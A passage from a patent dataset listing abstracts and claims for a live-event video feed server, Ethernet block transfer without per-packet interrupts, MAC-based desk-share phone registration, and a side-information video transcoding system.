receiving user information indicative of a preference to receive the first video feed based on the predetermined rules. 11. A server, comprising:
a transceiver configured to establish a connection to a computer network to which a user device is connected, the transceiver receiving an indication of a predetermined type of action during a live event; and a processor generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event, the processor identifying a user device that is to receive the first video feed based on predetermined rules, the processor determining whether the user device is prepared to receive the first video feed, wherein, when the user device is prepared, the transceiver transmits the first video feed to the user device for automatic playback on the user device to display a video of the predetermined type of action currently occurring during the live event. 12. The server of claim 11, wherein the first video feed has a predefined, finite duration. 13. The server of claim 12, wherein the predefined, finite duration is based on one of a server system clock, a game clock tracking the live event, or a length corresponding to the predetermined type of action. 14. The server of claim 12, wherein the predefined, finite duration is defined by an entity owning rights to the live event. 15. The server of claim 11, wherein the transceiver receives a request to view the broadcast feed, and wherein the processor generates an indication that the user device has requested to switch to the broadcast feed. 16. The server of claim 15, wherein the processor verifies that one of the user device or a user using the user device is entitled to view the broadcast feed. 17. The server of claim 11, wherein the user device is prepared when one of the user device is not currently playing a video, the user device has a particular application launched thereon, or a combination thereof. 18. 
The server of claim 17, wherein the transceiver transmits a status request to the user device to identify one of whether the user device is currently playing a video, whether the user device has a particular application launched thereon, or a combination thereof, and wherein the transceiver receives a response to the status request from the user device. 19. The server of claim 18, wherein, when the user device is unprepared to receive the first video feed, the transceiver transmits a message to be presented on the user device indicating that the predetermined type of action is occurring in the live event without displaying the first video feed. 20. A system, comprising:
an in-venue computing system configured to capture information associated with a live event and generate an indication that a predetermined type of action has occurred during the live event; and a server receiving the indication, the server generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event, the server identifying a user device that is to receive the first video feed based on predetermined rules, the server determining whether the user device is prepared to receive the first video feed, when the user device is prepared, the server transmitting the first video feed to the user device for automatic playback on the user device to display a video of the predetermined type of action currently occurring during the live event. | 2,400 |
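The per-device dispatch decision of claims 1, 7 and 9 above can be sketched in Python. This is an illustrative sketch; the device-record fields (`preferences`, `playing_video`, `app_launched`) are invented stand-ins for the claimed predetermined rules and readiness checks.

```python
# Hypothetical sketch of claims 1, 7 and 9: when a predetermined type of
# action occurs during a live event, a distinct first video feed is sent to
# each user device that (a) opted in for that action type under the
# predetermined rules and (b) is prepared - i.e. is not currently playing a
# video and has the particular application launched. An unprepared device
# instead gets a message that the action is occurring (claim 9).

def dispatch_action_feed(action_type, devices):
    """Map device id -> ("feed", clip) or ("message", text)."""
    results = {}
    clip = f"feed:{action_type}"  # stands in for the generated video feed
    for dev in devices:
        if action_type not in dev["preferences"]:  # predetermined rules
            continue
        prepared = (not dev["playing_video"]) and dev["app_launched"]
        if prepared:
            results[dev["id"]] = ("feed", clip)
        else:  # claim 9 fallback: notify without displaying the feed
            results[dev["id"]] = ("message", f"{action_type} is occurring now")
    return results
```

Devices that never opted in for the action type are skipped entirely, which mirrors the claim's "identifying a user device ... based on predetermined rules" step preceding the readiness check.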
9,190 | 9,190 | 16,064,100 | 2,463 | A method involves transferring a transmittal data block from a transmitting device via an Ethernet connection to a receiving device which has a storage for storing a transferred transmittal data block, and a processor for at least partially processing the transferred transmittal data block stored in the storage. The transmitting device forms from the data of the transmittal data block a sequence of Ethernet packets, each comprising management data and a transmittal data sub-block. The receiving device receives the Ethernet packets of the respective sequence and, while employing at least a part of the management data, writes the transmittal data sub-blocks of the received Ethernet packets of the sequence of Ethernet packets for the transmittal data block to the storage, wherein an interrupt is not sent to the processor upon or after the writing of each of the transmittal data sub-blocks. | 1.-18. (canceled) 19. A method for transferring a transmittal data block from a transmitting device, for example at least a part of a sensor or a part of an evaluation device, preferably for evaluating transmittal data, via an Ethernet connection to a receiving device, for example to an evaluating device for evaluating transmittal data, which has a storage for storing a transferred transmittal data block, and a processor for at least partially processing the transferred transmittal data block stored in the storage,
wherein the transmittal data in the transmittal data block are preferably sensor data of a sensor for the examination of value documents, in which the transmitting device forms from the data of the transmittal data block a sequence of Ethernet packets, which comprise respectively management data and a transmittal data sub-block, which is formed from at least a part of the data, so that the transmittal data sub-blocks of the Ethernet packets of the sequence comprise the data of the transmittal data block, wherein the management data comprise information from which it is establishable whether one of the Ethernet packets is the last Ethernet packet of the sequence, and sends the formed Ethernet packets via the Ethernet connection to the receiving device, and in which the receiving device receives the Ethernet packets of the respective sequence and, while employing at least a part of the management data, writes the transmittal data sub-blocks of the received Ethernet packets of the sequence of Ethernet packets for the transmittal data block to the storage, wherein an interrupt is not sent to the processor upon or after the writing of each of the transmittal data sub-blocks. 20. The method according to claim 19, in which a receive signal, for example an interrupt, is emitted to the processor, preferably emitted only if a pre-specified number of Ethernet packets of the sequence were received and the data of the transmittal data sub-blocks therein were written to the storage, and/or at least one pre-specified error occurs upon receiving or storing, and/or the transmittal data from the useful data block of the last Ethernet packet of the sequence were written to the storage. 21. 
The method according to claim 19, in which the receiving device has an FPGA, and in which by means of the FPGA, while employing the management data, the transmittal data sub-blocks from received Ethernet packets are written to the storage and in which preferably the FPGA triggers the emitting of a receive signal, for example an interrupt, to the processor after recognition and/or writing of the last transmittal data sub-block. 22. The method according to claim 19, in which the management data of each of the Ethernet packets of the sequence of Ethernet packets can comprise a sequence identifier for the transmittal data block which characterizes the transmittal data sub-block such that upon their employment, the transmittal data block can be formed from the transmittal data sub-blocks, and the sequence identifier is employed for writing the transmittal data sub-blocks to the storage. 23. The method according to claim 19, in which the management data of each of the Ethernet packets of the sequence of Ethernet packets comprise a sequence identifier for the transmittal data block which characterizes the transmittal data block. 24. The method according to claim 19, in which for at least one of the transmittal data sub-blocks at least two Ethernet packets are formed whose useful data block contains respectively the transmittal data sub-block, and are sent via the Ethernet connection to the receiving device, and upon reception of more than one Ethernet packet for the same transmittal data sub-block the data of the transmittal data sub-block are written only once to the storage or the data of the transmittal data sub-block are overwritten in the storage. 25. 
The method according to claim 19, in which at least one further transmitting device forms from the data of a further transmittal data block to be sent by it a further sequence of Ethernet packets which comprise respectively management data and a transmittal data sub-block which is formed from at least a part of the data, so that the transmittal data sub-blocks of the Ethernet packets of the further sequence comprise the data of the further transmittal data block,
wherein the management data comprise management data, from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the further sequence, and sends the formed Ethernet packets via the Ethernet connection to the receiving device, and in which the receiving device, after receiving the Ethernet packets, processes these in dependence on the transmitting device which has sent these, preferably separated according to transmitting device. 26. A transmitting device for sending at least one transmittal data block, for example in the form of a sensor or a part of an evaluation device, which
has a transmission buffer for at least partially and temporarily storing data of the transmittal data block, and an Ethernet interface, and is designed to form a sequence of Ethernet packets from the transmittal data block which respectively comprise management data and a transmittal data sub-block formed from the respective transmittal data block, so that the transmittal data sub-blocks of the Ethernet packets of the sequence comprise the data of the transmittal data block, wherein the management data comprise management data from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the sequence, and to send the Ethernet packets via the Ethernet interface. 27. The transmitting device according to claim 26, which further has a processor and instructions of a computer program upon whose execution the processor forms from the transmittal data block the sequence of Ethernet packets in the transmission buffer. 28. The transmitting device according to claim 26, which has an FPGA connected to the Ethernet interface or at least forming a part of the Ethernet interface, which is programmed such that it forms from the transmittal data block the management data and the transmittal data sub-blocks for the respective sequence of Ethernet packets. 29. The transmitting device according to claim 26, in which the Ethernet interface has an Ethernet controller, having an internal DMA functionality which is designed such that it can process descriptor lists independently. 30. A receiving device for receiving sequences of the Ethernet packets which are formable by a transmitting device and contain respectively transmittal data sub-blocks of a transmittal data block, having
a storage for storing a transferred transmittal data block, a processor for at least partially processing the transmittal data block stored in the storage, and a receiving portion which is designed for receiving sequences of Ethernet packets having data of the transmittal data block and writing respectively the transmittal data sub-blocks contained in the received Ethernet packets while employing at least a part of the management data in the storage, wherein the receiving portion is further designed such that the receiving portion does not send an interrupt to the processor upon or after the writing of each of the transmittal data sub-blocks. 31. The receiving device according to claim 30, in which the receiving portion is designed such that it emits a receive signal, for example an interrupt, to the processor, preferably emits only if a pre-specified amount of Ethernet packets of the same sequence were received and the transmittal data of the transmittal data sub-blocks therein were written to the storage and/or upon receiving or storing at least one pre-specified error occurs and/or the transmittal data from the useful data block of the last Ethernet packet of the sequence were written to the storage. 32. The receiving device according to claim 30, in which the receiving portion has an FPGA, wherein the receiving portion is designed such and the FPGA is configured or programmed such that by means of the FPGA, while employing the management data, the transmittal data sub-blocks from received Ethernet packets are written to the storage, and that the FPGA preferably after writing the transmittal data sub-blocks of a pre-specified amount of Ethernet packets of the sequence to the storage and/or writing of the last transmittal data sub-block of the sequence, triggers the emitting of a receive signal, for example an interrupt, to the processor. 33. 
The receiving device according to claim 32, in which the receiving portion has a PHY which is connected to the FPGA via a data connection, wherein the FPGA is further configured or programmed such that it works as an Ethernet controller. 34. The receiving device according to claim 32, in which the FPGA, the processor and the storage are connected via a PCIe network. 35. The receiving device according to claim 32, which comprises several PHY which are connected to the FPGA, and the FPGA is programmed such that transmittal data sub-blocks of Ethernet packets, which were received from a respective one of the PHY, respectively are written to the storage. 36. The receiving device according to claim 30, which also comprises a transmitting device, wherein the Ethernet interface of the transmitting device is given by a portion of the receiving portion which also works as an Ethernet interface of the transmitting device. | A method involves transferring a transmittal data block from a transmitting device via an Ethernet connection to a receiving device which has a storage for storing a transferred transmittal data block, and a processor for at least partially processing the transferred transmittal data block stored in the storage. The transmitting device forms from the data of the transmittal data block a sequence of Ethernet packets, comprising respectively management data and a transmittal data sub-block. The receiving device receives the Ethernet packets of the respective sequence and, while employing at least a part of the management data, writes the transmittal data sub-blocks of the received Ethernet packets of the sequence of Ethernet packets for the transmittal data block to the storage, wherein an interrupt is not sent to the processor upon or after the writing of each of the transmittal data sub-blocks. 1.-18. (canceled) 19. 
A method for transferring a transmittal data block from a transmitting device, for example at least a part of a sensor or a part of an evaluation device, preferably for evaluating transmittal data, via an Ethernet connection to a receiving device, for example to an evaluating device for evaluating transmittal data, which has a storage for storing a transferred transmittal data block, and a processor for at least partially processing the transferred transmittal data block stored in the storage,
wherein the transmittal data in the transmittal data block are preferably sensor data of a sensor for the examination of value documents, in which the transmitting device forms from the data of the transmittal data block a sequence of Ethernet packets, which comprise respectively management data and a transmittal data sub-block, which is formed from at least a part of the data, so that the transmittal data sub-blocks of the Ethernet packets of the sequence comprise the data of the transmittal data block, wherein the management data comprise management data, from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the sequence, and sends the formed Ethernet packets via the Ethernet connection to the receiving device, and in which the receiving device receives the Ethernet packets of the respective sequence and while employing at least a part of the management data writes the transmittal data sub-blocks of the received Ethernet packets of the sequence of Ethernet packets for the transmittal data block to the storage, wherein an interrupt is not sent to the processor upon or after the writing of each of the transmittal data sub-blocks. 20. The method according to claim 19, in which a receive signal, for example an interrupt, is emitted to the processor, preferably emitted only if a pre-specified amount of Ethernet packets of the sequence were received and the data of the transmittal data sub-blocks therein were written to the storage and/or upon receiving or storing at least one pre-specified error occurs and/or the transmittal data from the useful data block of the last Ethernet packet of the sequence were written to the storage. 21. 
The method according to claim 19, in which the receiving device has an FPGA, and in which by means of the FPGA, while employing the management data, the transmittal data sub-blocks from received Ethernet packets are written to the storage and in which preferably the FPGA triggers the emitting of a receive signal, for example an interrupt, to the processor after recognition and/or writing of the last transmittal data sub-block. 22. The method according to claim 19, in which the management data of each of the Ethernet packets of the sequence of Ethernet packets can comprise a sequence identifier for the transmittal data block which characterizes the transmittal data sub-block such that upon their employment, the transmittal data block can be formed from the transmittal data sub-blocks, and the sequence identifier is employed for writing the transmittal data sub-blocks to the storage. 23. The method according to claim 19, in which the management data of each of the Ethernet packets of the sequence of Ethernet packets comprise a sequence identifier for the transmittal data block which characterizes the transmittal data block. 24. The method according to claim 19, in which for at least one of the transmittal data sub-blocks at least two Ethernet packets are formed whose useful data block contains respectively the transmittal data sub-block, and are sent via the Ethernet connection to the receiving device, and upon reception of more than one Ethernet packet for the same transmittal data sub-block the data of the transmittal data sub-block are written only once to the storage or the data of the transmittal data sub-block are overwritten in the storage. 25. 
The method according to claim 19, in which at least one further transmitting device forms from the data of a further transmittal data block to be sent by it a further sequence of Ethernet packets which comprise respectively management data and a transmittal data sub-block which is formed from at least a part of the data, so that the transmittal data sub-blocks of the Ethernet packets of the further sequence comprise the data of the further transmittal data block,
wherein the management data comprise management data, from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the further sequence, and sends the formed Ethernet packets via the Ethernet connection to the receiving device, and in which the receiving device, after receiving the Ethernet packets, processes these in dependence on the transmitting device which has sent these, preferably separated according to transmitting device. 26. A transmitting device for sending at least one transmittal data block, for example in the form of a sensor or a part of an evaluation device, which
has a transmission buffer for at least partially and temporarily storing data of the transmittal data block, and an Ethernet interface, and is designed to form a sequence of Ethernet packets from the transmittal data block which respectively comprise management data and a transmittal data sub-block formed from the respective transmittal data block, so that the transmittal data sub-blocks of the Ethernet packets of the sequence comprise the data of the transmittal data block, wherein the management data comprise management data from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the sequence, and to send the Ethernet packets via the Ethernet interface. 27. The transmitting device according to claim 26, which further has a processor and instructions of a computer program upon whose execution the processor forms from the transmittal data block the sequence of Ethernet packets in the transmission buffer. 28. The transmitting device according to claim 26, which has an FPGA connected to the Ethernet interface or at least forming a part of the Ethernet interface, which is programmed such that it forms from the transmittal data block the management data and the transmittal data sub-blocks for the respective sequence of Ethernet packets. 29. The transmitting device according to claim 26, in which the Ethernet interface has an Ethernet controller, having an internal DMA functionality which is designed such that it can process descriptor lists independently. 30. A receiving device for receiving sequences of the Ethernet packets which are formable by a transmitting device and contain respectively transmittal data sub-blocks of a transmittal data block, having
a storage for storing a transferred transmittal data block, a processor for at least partially processing the transmittal data block stored in the storage, and a receiving portion which is designed for receiving sequences of Ethernet packets having data of the transmittal data block and writing respectively the transmittal data sub-blocks contained in the received Ethernet packets while employing at least a part of the management data in the storage, wherein the receiving portion is further designed such that the receiving portion does not send an interrupt to the processor upon or after the writing of each of the transmittal data sub-blocks. 31. The receiving device according to claim 30, in which the receiving portion is designed such that it emits a receive signal, for example an interrupt, to the processor, preferably emits only if a pre-specified amount of Ethernet packets of the same sequence were received and the transmittal data of the transmittal data sub-blocks therein were written to the storage and/or upon receiving or storing at least one pre-specified error occurs and/or the transmittal data from the useful data block of the last Ethernet packet of the sequence were written to the storage. 32. The receiving device according to claim 30, in which the receiving portion has an FPGA, wherein the receiving portion is designed such and the FPGA is configured or programmed such that by means of the FPGA, while employing the management data, the transmittal data sub-blocks from received Ethernet packets are written to the storage, and that the FPGA preferably after writing the transmittal data sub-blocks of a pre-specified amount of Ethernet packets of the sequence to the storage and/or writing of the last transmittal data sub-block of the sequence, triggers the emitting of a receive signal, for example an interrupt, to the processor. 33. 
The receiving device according to claim 32, in which the receiving portion has a PHY which is connected to the FPGA via a data connection, wherein the FPGA is further configured or programmed such that it works as an Ethernet controller. 34. The receiving device according to claim 32, in which the FPGA, the processor and the storage are connected via a PCIe network. 35. The receiving device according to claim 32, which comprises several PHY which are connected to the FPGA, and the FPGA is programmed such that transmittal data sub-blocks of Ethernet packets, which were received from a respective one of the PHY, respectively are written to the storage. 36. The receiving device according to claim 30, which also comprises a transmitting device, wherein the Ethernet interface of the transmitting device is given by a portion of the receiving portion which also works as an Ethernet interface of the transmitting device. | 2,400 |
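The claims above describe splitting a transmittal data block into packets whose management data carry a sequence identifier and a last-packet indication, with the receiver assembling the sub-blocks in storage and signaling the processor only once per sequence rather than per packet. The following is a minimal, hypothetical sketch of that scheme; the 13-byte header layout and all names (`form_packets`, `receive_packets`, the offset field) are illustrative assumptions, not taken from the patent.

```python
import struct

# Assumed management-data layout: sequence id, sub-block offset,
# sub-block length, last-packet flag (claim 19's "establishable whether
# one of the Ethernet packets is the last Ethernet packet").
HEADER = struct.Struct("!IIIB")

def form_packets(seq_id: int, block: bytes, mtu_payload: int = 1024):
    """Form the sequence of packets for one transmittal data block."""
    packets = []
    for off in range(0, len(block), mtu_payload):
        sub = block[off:off + mtu_payload]
        last = 1 if off + mtu_payload >= len(block) else 0
        packets.append(HEADER.pack(seq_id, off, len(sub), last) + sub)
    return packets

def receive_packets(packets, storage: bytearray) -> int:
    """Write each sub-block to storage using the management data; raise
    the receive signal (stand-in for an interrupt) only after the last
    sub-block of the sequence, not upon every write (claims 19-20)."""
    interrupts = 0
    for pkt in packets:
        seq_id, off, length, last = HEADER.unpack_from(pkt)
        # Re-received duplicates simply overwrite the same region (claim 24).
        storage[off:off + length] = pkt[HEADER.size:HEADER.size + length]
        if last:
            interrupts += 1
    return interrupts
```

Note the design point of the claims: because the offset in the management data determines where each sub-block lands, the receiver needs no per-packet involvement of the processor, so one signal at sequence end suffices.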
9,191 | 9,191 | 16,452,938 | 2,449 | The present invention relates to a method for automatically registering a user in a desk-share environment comprising a plurality of desks, each desk being equipped with an IP telephone connected to a communication network, in particular, to a local area network, wherein the IP telephone holds a data base comprising data of all desk-share users of the desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the method comprising the steps of: receiving, at the IP telephone, an IP data packet from a first terminal device via the communication network; verifying the MAC address in the IP data packet received from the first terminal device; and when the MAC address corresponds to a MAC address in the data of the data base, activating the user profile assigned to the MAC address in the IP telephone. Further, the invention relates to an IP telephone which is adapted to carry out the method for automatically registering a user in a desk-share environment. | 1. A method for automatically registering a user in a desk-share environment comprising a plurality of desks, each desk being equipped with an IP telephone connected to a communication network, wherein the IP telephone holds a data base comprising data of all desk-share users of the desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the method comprising the steps of:
receiving, at the IP telephone, an IP data packet containing a MAC address from a first terminal device via the communication network; verifying the MAC address in the IP data packet received from the first terminal device; and when the MAC address corresponds to a MAC address in the data of the data base, activating the user profile assigned to that MAC address in the IP telephone. 2. The method according to claim 1 wherein the IP telephone periodically receives IP data packets from the terminal device. 3. The method according to claim 1 wherein when in the step of verifying the MAC address, the IP telephone determines that the MAC address does not correspond to the MAC address of the activated user profile and is a new MAC address, then the method further comprises a step of:
checking whether the new MAC address is among the data in the data base; and
when it is determined that the new MAC address is among the data in the database, activating the user profile assigned to the new MAC address in the IP telephone. 4. The method according to claim 3 wherein the method further comprises a step of activating a default user profile when it is determined that the new MAC address is not among the data in the database. 5. The method according to claim 3 wherein the method further comprises a step of activating the previously activated user profile when it is determined that the new MAC address is not among the data in the database. 6. The method according to claim 3 wherein the method further comprises a step of activating an emergency calls only mode when it is determined that the new MAC address is not among the data in the database. 7. The method according to claim 2 wherein the method further comprises a step of detecting one of a stop of the data traffic received from the first terminal device and a change in the periodically received data packets. 8. The method according to claim 7 wherein when a stop of the data traffic received from the first terminal device is detected by the IP telephone, then the IP telephone proceeds according to a preselected option from a number of options selected from the group consisting of activating a default user profile, activating an emergency calls only mode, and maintaining the activated user profile. 9. The method according to claim 1 wherein the communications network is a local area network. 10. An IP telephone which is adapted to carry out the method according to claim 1 wherein the IP telephone is adapted to hold a database comprising data of a plurality of desk-share users of a desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the IP telephone comprising:
means for receiving an IP data packet from a first terminal device via the LAN;
means for verifying the MAC address in the IP data packet received from the first terminal device; and
means for activating the user profile assigned to the MAC address in the IP telephone. 11. The IP telephone according to claim 10 wherein the IP telephone is a VoIP telephone. 12. The IP telephone according to claim 10, wherein the IP telephone further comprises means for activating a user profile according to a predetermined time schedule. | The present invention relates to a method for automatically registering a user in a desk-share environment comprising a plurality of desks, each desk being equipped with an IP telephone connected to a communication network, in particular, to a local area network, wherein the IP telephone holds a data base comprising data of all desk-share users of the desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the method comprising the steps of: receiving, at the IP telephone, an IP data packet from a first terminal device via the communication network; verifying the MAC address in the IP data packet received from the first terminal device; and when the MAC address corresponds to a MAC address in the data of the data base, activating the user profile assigned to the MAC address in the IP telephone. Further, the invention relates to an IP telephone which is adapted to carry out the method for automatically registering a user in a desk-share environment.1. A method for automatically registering a user in a desk-share environment comprising a plurality of desks, each desk being equipped with an IP telephone connected to a communication network, wherein the IP telephone holds a data base comprising data of all desk-share users of the desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the method comprising the steps of:
receiving, at the IP telephone, an IP data packet containing a MAC address from a first terminal device via the communication network; verifying the MAC address in the IP data packet received from the first terminal device; and when the MAC address corresponds to a MAC address in the data of the data base, activating the user profile assigned to that MAC address in the IP telephone. 2. The method according to claim 1 wherein the IP telephone periodically receives IP data packets from the terminal device. 3. The method according to claim 1 wherein when in the step of verifying the MAC address, the IP telephone determines that the MAC address does not correspond to the MAC address of the activated user profile and is a new MAC address, then the method further comprises a step of:
checking whether the new MAC address is among the data in the data base; and
when it is determined that the new MAC address is among the data in the database, activating the user profile assigned to the new MAC address in the IP telephone. 4. The method according to claim 3 wherein the method further comprises a step of activating a default user profile when it is determined that the new MAC address is not among the data in the database. 5. The method according to claim 3 wherein the method further comprises a step of activating the previously activated user profile when it is determined that the new MAC address is not among the data in the database. 6. The method according to claim 3 wherein the method further comprises a step of activating an emergency calls only mode when it is determined that the new MAC address is not among the data in the database. 7. The method according to claim 2 wherein the method further comprises a step of detecting one of a stop of the data traffic received from the first terminal device and a change in the periodically received data packets. 8. The method according to claim 7 wherein when a stop of the data traffic received from the first terminal device is detected by the IP telephone, then the IP telephone proceeds according to a preselected option from a number of options selected from the group consisting of activating a default user profile, activating an emergency calls only mode, and maintaining the activated user profile. 9. The method according to claim 1 wherein the communications network is a local area network. 10. An IP telephone which is adapted to carry out the method according to claim 1 wherein the IP telephone is adapted to hold a database comprising data of a plurality of desk-share users of a desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the IP telephone comprising:
means for receiving an IP data packet from a first terminal device via the LAN;
means for verifying the MAC address in the IP data packet received from the first terminal device; and
means for activating the user profile assigned to the MAC address in the IP telephone. 11. The IP telephone according to claim 10 wherein the IP telephone is a VoIP telephone. 12. The IP telephone according to claim 10, wherein the IP telephone further comprises means for activating a user profile according to a predetermined time schedule. | 2,400 |
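The desk-share claims above boil down to a lookup: the phone's local database maps a terminal's MAC address to a user profile, and each received IP data packet triggers verification of the source MAC and activation of the matching profile, with a fallback when the MAC is unknown (claim 4's default-profile option). A minimal sketch under assumed names (`DeskSharePhone`, `on_ip_packet`); the patent does not specify this API.

```python
class DeskSharePhone:
    """Hypothetical model of the claimed IP telephone logic."""

    def __init__(self, database, default_profile="default"):
        # database: {mac_address: (user_id, profile_name)}, i.e. the
        # per-phone data base of all desk-share users (claim 1).
        self.database = {mac.lower(): v for mac, v in database.items()}
        self.default_profile = default_profile
        self.active_profile = default_profile

    def on_ip_packet(self, source_mac: str) -> str:
        """Verify the MAC address from a received IP data packet and
        activate the assigned user profile; fall back to the default
        profile when the MAC is not in the database (claim 4)."""
        entry = self.database.get(source_mac.lower())
        if entry is not None:
            _user_id, profile = entry
            self.active_profile = profile
        else:
            self.active_profile = self.default_profile
        return self.active_profile
```

Claims 5 and 6 describe alternative fallbacks (keep the previously activated profile, or switch to an emergency-calls-only mode); those would replace the `else` branch above.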
9,192 | 9,192 | 13,915,499 | 2,486 | A split architecture for encoding a video stream. A source encoder may encode a video content stream to obtain an encoded bitstream and a side information stream. The side information stream includes information characterizing rate and/or distortion estimation functions per block of the video content stream. Also, a different set of estimation functions may be included per coding mode. The encoded bitstream and side information stream may be received by a video transcoder, which transcodes the encoded bitstream to a client-requested picture resolution, according to a client-requested video format and bit rate. The side information stream allows the transcoder to efficient and compactly perform rate control for its output bitstream, which is transmitted to the client device. This split architecture may be especially useful to operators of content delivery networks. | 1. A system comprising:
a memory that stores a collection of video content items, wherein each of the video content items includes a corresponding encoded video stream and corresponding side information stream; one or more video transcoder devices; and a controller, wherein, in response to each of a plurality of content requests for a given one of the video content items from a respective plurality of user devices, the controller is configured to assign an available one of the one or more video transcoder devices to serve the respective user device, wherein the user devices have respectively different configurations of video processing capability (VPC), wherein each assigned video transcoder device is configured to: receive the encoded video stream and side information stream of the given video content item; and transcode the encoded video stream using the side information stream and according to the VPC configuration of the respective user device, in order to obtain a respective target encoded video stream; and transmit the respective target encoded video stream to the respective user device through a communication medium. 2. The system of claim 1, wherein the encoded video stream of the given video content item is an encoded version of a given source video stream, wherein the side information stream includes metadata that characterizes properties of the given source video stream. 3. The system of claim 2, wherein the metadata includes one or more candidate motion vectors per block of the encoded video stream of the given content item. 4. The system of claim 2, wherein the metadata includes rate modeling data per block of the encoded video stream of the given content item. 5. The system of claim 2, wherein the metadata includes distortion modeling data per block of the encoded video stream of the given content item. 6. The system of claim 1, wherein the communication medium is a wireless transmission medium. 7. 
The system of claim 6, wherein at least one of the one or more video transcoder devices is coupled to or incorporated as part of a base station of a wireless communication network, wherein one or more of the user devices are configured for wireless communication with the base station. 8. The system of claim 1, wherein the controller is configured to assign a first of the one or more video transcoder devices to different ones of the user devices at different times. 9. The system of claim 1, further comprising:
a source encoder configured to encode source video streams to generate respective ones of the content items, wherein each of the one or more video transcoder devices is more power efficient than the source encoder, and/or more space efficient than the source encoder. 10. The system of claim 1, wherein the side information stream of each video content item includes one or more rate information streams corresponding to one or more respective coding modes, wherein each rate information stream RISk of the one or more rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the corresponding encoded video stream, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 11. The system of claim 1, wherein the side information stream of each video content item includes one or more distortion information streams corresponding to one or more respective coding modes, wherein each distortion information stream DISk of the one or more distortion information streams characterizes a corresponding distortion function Dk(q) per block of the encoded video stream of the video content item, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 12. The system of claim 1, wherein a first of the one or more video transcoder devices is configured to perform said transcoding by:
decoding the encoded video stream to obtain a decoded video stream; scaling the decoded video stream to a target picture resolution of the respective user device, in order to obtain a scaled video stream; and encoding the scaled video stream using the side information and according to the VPC configuration of the respective user device, in order to obtain the respective target encoded video stream. 13. The system of claim 12, wherein the controller is configured to:
receive reports from the user device being served by the first video transcoder device, wherein each of the reports includes analytical information from the user device; and in response to each of the reports, update a target bit rate and/or the target picture resolution used by the first video transcoder device to encode the scaled video stream. 14. The system of claim 13, wherein the analytical information includes information about quality of a link between the first video transcoder device and the user device. 15. The system of claim 14, wherein the controller is configured to decrease or increase the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about link quality indicates that the link quality has decreased or increased, respectively. 16. The system of claim 13, wherein the analytical information includes information about the quality of video recovered from the respective target encoded video stream transmitted by the first video transcoder device. 17. The system of claim 16, wherein the controller is configured to decrease or increase the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about video quality indicates that the video quality has decreased or increased, respectively. 18. The system of claim 12, wherein the controller is configured to:
receive reports from the user device being served by the first video transcoder device, wherein each of the reports includes a corresponding update to the VPC configuration of the user device; and in response to each of the reports, update the target picture resolution used by the first video transcoder device to encode the scaled video stream. 19. The system of claim 1, wherein the VPC configuration of each user device includes an identification of one or more of:
a video coding format requested by the user device; and a target picture resolution requested by the user device. 20. The system of claim 1, wherein the VPC configurations of the respective user devices span an M-dimensional configuration space, wherein M is at least two, wherein the M-dimensional configuration space has at least a first dimension corresponding to a choice of video format and a second dimension corresponding to a selection of picture resolution. 21. The system of claim 1, wherein the controller is configured to:
store the target encoded video stream generated by a given one of the one or more video transcoder devices that has been assigned to serve a first of the user devices; and direct a transmission of the stored target encoded video stream to a second user device in response to detecting that the second user device has a same or similar VPC configuration as the first user device. 22. A method for delivering video content to user devices, the method comprising:
storing a collection of video content items in a memory, wherein each of the video content items includes a corresponding encoded video stream and corresponding side information stream; in response to each of a plurality of content requests for a given one of the video content items from a respective plurality of remote user devices, assigning an available one of one or more video transcoder devices to serve the respective user device, wherein the user devices have respectively different configurations of video processing capability (VPC); utilizing each assigned video transcoder device to: receive the encoded video stream and side information stream of the given video content item; transcode the encoded video stream using the side information stream and according to the VPC configuration of the respective user device, in order to obtain a respective target encoded video stream; and transmit the respective target encoded video stream to the respective user device through a communication medium. 23. The method of claim 22, wherein the encoded video stream of the given video content item is an encoded version of a given source video stream, wherein the side information stream includes metadata that characterizes properties of the given source video stream. 24. The method of claim 23, wherein the metadata includes one or more candidate motion vectors per block of the encoded video stream of the given video content item. 25. The method of claim 23, wherein the metadata includes rate modeling data per block of the encoded video stream of the given video content item. 26. The method of claim 23, wherein the metadata includes distortion modeling data per block of the encoded video stream of the given video content item. 27. 
The method of claim 22, wherein the side information stream of each video content item includes one or more rate information streams corresponding to one or more respective coding modes, wherein each rate information stream RISk of the one or more rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the corresponding encoded video stream, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 28. The method of claim 22, wherein the side information stream of each video content item includes one or more distortion information streams corresponding to one or more respective coding modes, wherein each distortion information stream DISk of the one or more distortion information streams characterizes a corresponding distortion function Dk(q) per block of the encoded video stream of the given video content item, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 29. The method of claim 22, further comprising:
encoding source video streams to generate respective ones of the content items, wherein said encoding the source video stream is performed by a source encoder, wherein each of the video transcoder devices consumes less power than the source encoder, and occupies less space than the source encoder. 30. The method of claim 22, further comprising:
receiving reports from the user device being served by a first of the one or more video transcoder devices, wherein each of the reports includes analytical information from the user device; and in response to each of the reports, updating a target bit rate and/or the target picture resolution used by the first video transcoder device to perform said transcoding of the encoded video stream. 31. The method of claim 30, wherein the analytical information includes information about quality of a link between the first video transcoder device and the user device. 32. The method of claim 31, further comprising:
decreasing or increasing the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about link quality indicates that the link quality has decreased or increased, respectively. 33. The method of claim 30, wherein the analytical information includes information about the quality of video recovered from the respective target encoded video stream transmitted by the first video transcoder device. 34. The method of claim 33, further comprising:
